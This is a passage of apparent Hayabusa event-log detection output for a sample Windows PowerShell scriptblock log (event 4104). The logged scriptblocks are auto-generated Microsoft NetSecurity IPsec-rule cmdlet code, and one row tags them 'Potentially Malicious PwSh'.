[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] 
[Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ValidateNotNull()] [ValidateNotNullOrEmpty()] [string[]] ${Servers}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ValidateNotNull()] [ValidateNotNullOrEmpty()] [string[]] ${Domains}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType] ${EndpointType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion] ${AddressType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${DnsServers}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', 
$__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if 
($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and 
(@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 
'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Servers')) { [object]$__cmdletization_value = ${Servers} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Servers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Servers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Domains')) { [object]$__cmdletization_value = ${Domains} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Domains'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Domains'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EndpointType')) { [object]$__cmdletization_value = ${EndpointType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AddressType')) { [object]$__cmdletization_value = ${AddressType} $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AddressType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AddressType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Output'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}) 
DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) 
$__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) 